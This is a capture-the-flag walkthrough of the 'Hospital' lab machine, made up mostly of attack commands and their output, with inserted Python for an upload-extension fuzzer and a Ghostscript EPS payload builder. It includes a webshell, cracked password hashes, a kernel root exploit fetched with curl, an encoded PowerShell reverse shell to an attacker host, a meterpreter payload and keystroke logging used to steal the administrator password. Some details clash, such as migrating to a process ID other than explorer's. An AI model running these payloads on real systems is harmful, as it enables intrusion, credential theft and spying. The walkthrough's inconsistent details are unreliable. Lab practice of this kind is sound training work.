Hospital
Recon
HTTP (8080)

Creds:
letmein:letmein
When logged in we get an upload form:

We can fuzz the extension (Burp Intruder) to see which ones the upload filter accepts.
Wordlist =
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
To flag the interesting responses in Intruder, go to Settings, Grep Match, add the string from the success/failure message and tick "include headers" so a redirect is caught too.
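As an added example (my own code, not the writeup's tooling), a Python fuzzer that goes one step further than Intruder's grep match: it uploads a tagged PHP probe under every candidate extension, fetches it back from /uploads/, and separates "rejected", "stored but served raw" and "executed", since an accepted extension is only useful if Apache hands it to the PHP handler. The upload URL (/upload.php), the form field name (image) and the session cookie are assumptions; the uploads path is the one from the page.

```python
"""Upload-extension fuzzer: which extensions are accepted AND which ones the
server actually executes as PHP. Added example, not the writeup's tooling.
Assumed (not on the page): form field "image", upload endpoint /upload.php,
a valid PHPSESSID cookie; uploads land at <uploads_base>/<filename>."""
import urllib.error
import urllib.request
import uuid

# Constructed short list; the writeup uses seclists web-extensions.txt.
CANDIDATE_EXTENSIONS = [".php", ".php3", ".php5", ".phtml", ".phar", ".pht", ".phps", ".inc", ".txt"]

MARKER = "EXT-OK-" + uuid.uuid4().hex            # per-run tag so a hit can't be a stale/cached file
PROBE_BODY = "<?php echo '" + MARKER + "'; ?>"     # prints the tag only if interpreted as PHP


def classify(status, body):
    """Decide what the server did with probe.<ext>. Raw source also contains
    MARKER, so the '<?php' check has to come before the marker check."""
    if status == 404:
        return "rejected"                       # never stored (or stored somewhere else)
    if "<?php" in body:
        return "stored-raw"                     # accepted but served as text: no code execution
    if MARKER in body:
        return "EXECUTED"                       # extension is mapped to the PHP handler
    return "stored-other-%d" % status           # e.g. 403 from a handler that blocks it


def default_post(upload_url, filename, content, headers=None, field="image"):
    """Multipart POST built by hand so only the stdlib is needed."""
    boundary = "----probe" + uuid.uuid4().hex
    body = (
        "--%s\r\n"
        'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        "%s\r\n--%s--\r\n" % (boundary, field, filename, content, boundary)
    ).encode()
    req = urllib.request.Request(upload_url, data=body, method="POST", headers=headers or {})
    req.add_header("Content-Type", "multipart/form-data; boundary=" + boundary)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def default_get(url, headers=None):
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def fuzz_upload_extensions(upload_url, uploads_base, extensions=CANDIDATE_EXTENSIONS,
                           headers=None, post=default_post, get=default_get, basename="probe"):
    """Upload probe.<ext> for every extension, fetch it back, return {ext: verdict}."""
    verdicts = {}
    for ext in extensions:
        filename = basename + ext
        post(upload_url, filename, PROBE_BODY, headers)
        status, body = get(uploads_base.rstrip("/") + "/" + filename, headers)
        verdicts[ext] = classify(status, body)
    return verdicts


def executable_extensions(verdicts):
    """Only these are worth using for a webshell."""
    return sorted(ext for ext, verdict in verdicts.items() if verdict == "EXECUTED")


if __name__ == "__main__":
    # Against the box from the writeup; replace the cookie with a logged-in session.
    hdrs = {"Cookie": "PHPSESSID=REPLACE_ME"}
    found = fuzz_upload_extensions("http://hospital.htb:8080/upload.php",
                                   "http://hospital.htb:8080/uploads", headers=hdrs)
    for ext, verdict in found.items():
        print("%-8s %s" % (ext, verdict))
    print("usable:", executable_extensions(found))
```

On Debian/Ubuntu the stock php module config maps `.phar` and `.phtml` to the PHP handler as well as `.php` (FilesMatch ".+\.ph(ar|p|tml)$"), which is why a `.phar` webshell runs on this box even though the upload filter rejects `.php`.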

Not sure why, but shell.phar wasn't getting uploaded. Changing the file name (keeping the .phar extension) helped.
Webshell: http://hospital.htb:8080/uploads/letmein.phar

www-data@webserver:…/www/html# cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' -e 'SHOW DATABASES;'
Database
hospital
information_schema
mysql
performance_schema
sys
www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SHOW TABLES;'
Tables_in_hospital
users
www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SELECT * FROM users;'
id username password created_at
1 admin $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 2023-09-21 14:46:04
2 patient $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO 2023-09-21 15:35:11
3 letmein $2y$10$PW.UkTvD9dHa4US0a6Ke5.0uAiwRZTT5mbH7ixP3NyKoByFk/W4su 2024-11-26 02:53:45
Bruteforce admin password
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456 (?)
1g 0:00:00:00 DONE (2024-11-26 00:20) 1.915g/s 137.9p/s 137.9c/s 137.9C/s 123456..666666
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Creds don't work anywhere we know...
The target is a Windows machine, but we are clearly inside a Linux container (Ubuntu 23.04, kernel 5.19.0-35 below). Linpeas didn't give anything useful; the box is somewhat old, so we can assume there's a kernel exploit of some sort.
www-data@webserver:/var/www/html/uploads$ curl 10.10.14.99/lp.sh|sh|tee /tmp/lp.log
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.19.0-35-generic (buildd@lcy02-amd64-014) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.2.0-3ubuntu1) 12.2.0, GNU ld (GNU Binutils for Ubuntu) 2.39) #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023
Distributor ID: Ubuntu
Description: Ubuntu 23.04
Release: 23.04
Codename: lunar
...
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/go
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
CVE-2023-35001 (nftables): the exploit used at Pwn2Own Vancouver 2023 on Ubuntu desktop. It supports the kernel version available at the beginning of the event (5.19.0-35), which is exactly what this box runs. gcc and go are installed on the box, so it could even be built there; here it is compiled on the attacking machine and uploaded as a zip.
└─$ git clone https://github.com/synacktiv/CVE-2023-35001.git
└─$ cd CVE-2023-35001
└─$ make
---
www-data@webserver:/tmp$ cd `mktemp -d`
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ curl 10.10.14.99/CVE-2023-35001/lpe.zip -O
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ busybox unzip lpe.zip
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ chmod +x ./*
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ ./exploit
./exploit
[+] Using config: 5.19.0-35-generic
[+] Recovering module base
[+] Module base: 0xffffffffc0679000
[+] Recovering kernel base
[+] Kernel base: 0xffffffffaa000000
[+] Got root !!!
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/shadow | grep ':\$'
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
Note: CVE-2023-2640-CVE-2023-32629 GameOver(lay) exploit should also be valid for this kernel.
The only hash worth cracking is drwilliams'. root's is yescrypt ($y$), which hashcat doesn't support (john does) and which is slow anyway; drwilliams' $6$ hash is sha512crypt, hashcat mode 1800.
➜ .\hashcat.exe --show .\hashes
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
➜ .\hashcat.exe -m 1800 -a 0 .\hashes .\rockyou.txt
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
HTTPs (443)
There's HTTPs server which is serving RoundCube webmail.

Creds:
drwilliams:qwe123!@#
Using the SSH credentials (drwilliams) we can also log into the webmail. There's a mail from a new user, drbrown.

About shows version Roundcube Webmail 1.6.4.
CVE-2023-43770 (stored XSS) has a public PoC, but it was fixed in 1.6.3, and we can't do much with an XSS here anyway, so probably not useful...
CVE-2023-36664
drbrown's mail says he is waiting for a GhostScript (.eps) file. CVE-2023-36664 (Ghostscript command injection through the %pipe% device, fixed in 10.01.2) could be a valid exploit considering the dates.
└─$ git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git
└─$ cd CVE-2023-36664-Ghostscript-command-injection
└─$ py CVE_2023_36664_exploit.py -f file.eps -p 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -i
Sending a new email directly to drbrown doesn't trigger anything, but replying to his message gets us a connection back.
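As an added example (my own code, not the jakabakos PoC used above), a Python builder for the primitive CVE-2023-36664 relies on, plus the two checks a defender would run on this box: a scanner for %pipe% device opens in incoming .ps/.eps attachments and an audit of the Ghostscript command line. The EPS layout is a minimal one of my own and does not reproduce the PoC's injection point; the version and flags used in the audit (gs10.01.1, -dNOSAFER) are the ones from ghostscript.bat later on the page.

```python
"""Ghostscript %pipe% command injection (CVE-2023-36664): payload builder,
attachment scanner and invocation audit. Added example; the EPS layout is
my own minimal one, not the jakabakos PoC's."""
import re

# Opening the pseudo-file %pipe%<cmd> for writing makes Ghostscript popen(<cmd>).
# -dSAFER (the default since 9.50) is meant to refuse %pipe%; 10.01.1 and older
# let it through (CVE-2023-36664, fixed in 10.01.2), and -dNOSAFER turns the
# check off altogether, so on this box the payload works on any version.
EPS_TEMPLATE = (
    "%!PS-Adobe-3.0 EPSF-3.0\n"
    "%%BoundingBox: 0 0 200 200\n"
    "%%Title: design.eps\n"          # constructed: a plausible name for drbrown's file
    "%%EndComments\n"
    "(%pipe%{cmd}) (w) file\n"        # the injection; cmd is escaped by ps_escape
    "showpage\n"
    "%%EOF\n"
)
FIX_VERSION = (10, 1, 2)


def ps_escape(s):
    """Escape characters that would break a PostScript (...) string literal."""
    return s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")


def build_eps(cmd):
    """EPS text that runs `cmd` when Ghostscript interprets it with %pipe% allowed."""
    return EPS_TEMPLATE.format(cmd=ps_escape(cmd))


# (%pipe%cmd) (w) file   |   (|cmd) (w) file   |   /OutputFile (%pipe%cmd)
PIPE_OPEN = re.compile(r"\(\s*(?:%pipe%|\|)(?:\\.|[^)\\])*\)\s*\([rwa]\+?\)\s*file", re.I)
OUTPUTFILE_PIPE = re.compile(r"/OutputFile\s*\(\s*(?:%pipe%|\|)", re.I)


def scan_postscript(text):
    """Findings for an incoming .ps/.eps attachment: list of (rule, matched snippet)."""
    hits = [("pipe-device-open", m.group(0)) for m in PIPE_OPEN.finditer(text)]
    hits += [("outputfile-pipe", m.group(0)) for m in OUTPUTFILE_PIPE.finditer(text)]
    return hits


def parse_version(v):
    return tuple(int(p) for p in v.split("."))


def audit_gs_invocation(argv, version):
    """Why a given gs command line is exploitable; an empty list means OK."""
    issues = []
    if "-dNOSAFER" in argv:
        issues.append("-dNOSAFER disables the SAFER sandbox: %pipe% works on every version")
    if parse_version(version) < FIX_VERSION:
        issues.append("Ghostscript %s predates the CVE-2023-36664 fix (10.01.2)" % version)
    return issues


if __name__ == "__main__":
    # Constructed stand-in for the encoded PowerShell used in the writeup.
    eps = build_eps("powershell -e JABjAGwA...")
    open("file.eps", "w").write(eps)
    print(scan_postscript(eps))
    # Command line from ghostscript.bat on the DC:
    print(audit_gs_invocation(["gswin64c.exe", "-dNOSAFER", "design.eps"], "10.01.1"))
```

The audit makes the practical point explicit: ghostscript.bat passes -dNOSAFER, so the sandbox is off and a %pipe% payload would run even against a patched Ghostscript; the CVE only matters when -dSAFER is in effect. The fix on the defender's side is both an upgrade to 10.01.2 or later and dropping -dNOSAFER from the script.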

└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.229.189:8166.
whoami /all
User Name SID
================ ==============================================
hospital\drbrown S-1-5-21-4208260710-2273545631-1523135639-1601
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\drbrown.HOSPITAL\Documents> cat ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
WinRM
Creds:
drbrown:chr!$br0wn
└─$ netexec smb 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
SMB 10.129.229.189 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.189 445 DC [+] hospital.htb\drbrown:chr!$br0wn
└─$ netexec winrm 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
WINRM 10.129.229.189 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:hospital.htb)
WINRM 10.129.229.189 5985 DC [+] hospital.htb\drbrown:chr!$br0wn (Pwn3d!)
└─$ evil-winrm -i hospital.htb -u 'drbrown' -p 'chr!$br0wn'
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Documents>
User.txt
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\drbrown.HOSPITAL\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/25/2024 6:42 PM 34 user.txt
793506c3c5106406a122b94fec45c2d3
Privilege Escalation
Nothing useful from bloodhound
└─$ bloodhound-python -ns 10.129.229.189 -d hospital.htb -u 'drbrown' -p 'chr!$br0wn' -c all --zip -op drbrown
Enumerate with winpeas
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> iwr 10.10.14.99/wp.exe -outfile wp.exe
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> .\wp.exe | tee-object -filepath wp.log
...
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
[X] Exception: Unable to cast object of type 'System.Int32' to type 'System.String'.
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Program Files\Python312\Scripts\;C:\Program Files\Python312\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\gs\gs10.01.1\bin;C:\Program Files\PuTTY\;C:\Program Files\dotnet\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
...
╔══════════╣ AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
...
╔══════════╣ Interesting Services -non Microsoft-
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[X] Exception: Access denied
Apache2.4(Apache Software Foundation - Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Autoload
Possible DLL Hijacking in binary folder: C:\xampp\apache\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
...
╔══════════╣ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\drbrown.HOSPITAL\Music\wp.exe": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\Documents\ghostscript.bat": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\connect.bat": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\.cache\selenium\IEDriverServer\win32\4.14.0\IEDriverServer.exe": drbrown [AllAccess]
...
╔══════════╣ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console drbrown HOSPITAL Active
Path 1
We basically have write permissions on the XAMPP directory. That is a common misconfiguration: the XAMPP installer doesn't lock down its folder ACLs, and the Apache2.4 service runs as NT AUTHORITY\SYSTEM, so any PHP file dropped into C:\xampp\htdocs executes as SYSTEM. Worth confirming both the service account (sc qc) and the htdocs ACL (icacls) before relying on it.
...
*Evil-WinRM* PS C:\xampp\htdocs> curl 10.10.14.99/shell.php -outfile C:\xampp\htdocs\shell.php

Path 2 (Failed)
Because of the UAC policy, RunasCs should have worked, but it failed... Interesting.
.\rc.exe drbrown 'chr!$br0wn' 'whoami /all' -b -l 5
Path 3
If we RDP in, we can watch an automated script logging into the webmail, presumably to emulate a user. It logs in as Administrator, which is how the password leaks (see Path 4 for the keylogged version).
Creds: Administrator:Th3B3stH0sp1t4l9786!

Path 4
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
└─$ msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
---
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> upload www/rev.exe
Info: Uploading /home/woyag/Desktop/Rooms/Hospital/www/rev.exe to C:\Users\drbrown.HOSPITAL\Music\rev.exe
---
https://www.offsec.com/metasploit-unleashed/keylogging/
To capture keystrokes you either attach to a specific process or to explorer.exe in the user's session; explorer is generally the better choice since it lives for the whole interactive session and sees every keystroke, including the ones typed into the browser's login form.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
6600 6680 explorer.exe x64 1 HOSPITAL\drbrown C:\Windows\explorer.exe
meterpreter > migrate 2668
[*] Migrating from 760 to 2668...
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
administratorTh3B3stH0s
meterpreter > keyscan_dump
Dumping captured keystrokes...
p1t4l97861AdministratorTh3B3stH0sp1t4l9786!
└─$ evil-winrm -i hospital.htb -u 'Administrator' -p 'Th3B3stH0sp1t4l9786!'
Root.txt
*Evil-WinRM* PS C:\Users\Administrator> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/26/2024 5:11 PM 34 root.txt
ce1ed92833a67c42e95b78194c9c6941